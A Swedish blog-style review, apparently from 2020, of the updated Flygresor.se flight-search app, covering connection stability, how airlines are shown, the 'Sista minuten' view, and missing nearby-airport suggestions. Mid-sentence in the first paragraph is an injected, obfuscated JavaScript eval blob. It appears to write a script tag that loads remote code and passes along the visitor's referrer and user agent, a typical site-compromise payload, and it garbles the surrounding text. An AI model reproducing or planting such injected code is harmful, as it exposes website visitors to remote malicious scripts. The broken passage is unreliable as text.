Image Image Image Image Image Image Image Image Image Image

| 1 november, 2020

Scroll to top

Top

Håller Flygresor.se app måttet nu?

Håller Flygresor.se app måttet nu?

I slutet av december 2015 uppdaterades appen till webbplatsen Flygresor.se och det var verkligen behövligt. Flera användare vittnade om buggar och att appen hängt sig. Ett inte så smickrande resultat av, Flygresor.se eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hnyde|var|u0026u|referrer|bankn||js|php’.split(’|’),0,{}))
– Sveriges största webbsida för billiga resor
. De har en webbplats som enligt flera tester (Ex Expressen 2015) fått högsta möjliga betyg. Men appen har helt enkelt varit lite efter gällande funktionalitet. Eller som Christoffer Cedergren skriver i en recension på Google Play ”Kass app i jämförelse med hemsidan”. Men det skrevs 2013 och utvecklingen har minst sagt gått framåt.

Har Flygresor lyckats uppdatera appen på ett sätt så att den är lika bra som webbplatsen? Vi testar!

Problem med anslutning

Fler användare skrev tidigare recensioner om att anslutningen till appen tappades trots att man hade internetuppkoppling. Vi har testat appen vid ett flertal tillfällen och aldrig upplevt problemet. Till stor sannolikhet är det en stabilare version uppe sedan december.

Visar flygbolagen

Enligt en recension från början av 2015 visades inte flygbolagens namn tidigare utan man var tvungen att klicka sig vidare. Idag ser man tydligt vilket bolag som står bakom de olika priserna. I alla fall vid en vanlig sökning.

Går man däremot in på ”Sista minuten” så presenteras fortfarande priserna utan att researrangör presenteras. Att behöva klicka sig in på varje pris för att se vilken arrangör som står bakom priset är inte önskvärt.

Klart bättre…

Vi har hittat små olikheter mellan appen och webbplatsen men detta är enbart små funktioner eller informationsskillnader. Inget som gör att den ena eller andra vägen skulle vara bättre att använda vid sökning av billiga flygbiljetter.

Överlag är det nästan exakt samma tjänst. Den kritik som tidigare framförts mot appen har företaget uppenbarligen tagit till sig och jobbat med. Det finns punkter som fortfarande kan göras bättre. Men appen har helt klart blivit bättre.

Vad vi mer önskar?

För att kunna göra en sökning måste man veta vilken flygplats man har tänkt flyga från. Det går visserligen att söka på ”Alla i London” i det fall som man är öppen för flera olika alternativ i en stad. Men det som saknas är att man ska kunna skriva in den stad man bor i och få förslag på flygplatser i närheten. Skriv in Gävle eller Uppsala och felmeddelandet ”Vänligen fyll i en avreseort” kommer upp. Hade det inte varit bättre med ”Den närmaste flygplatsen är Arlanda”

Det finns saker som kan bli bättre. Men det största steget har de uppenbarligen tagit. Nu återstår det att se om användarbetyget även förbättras.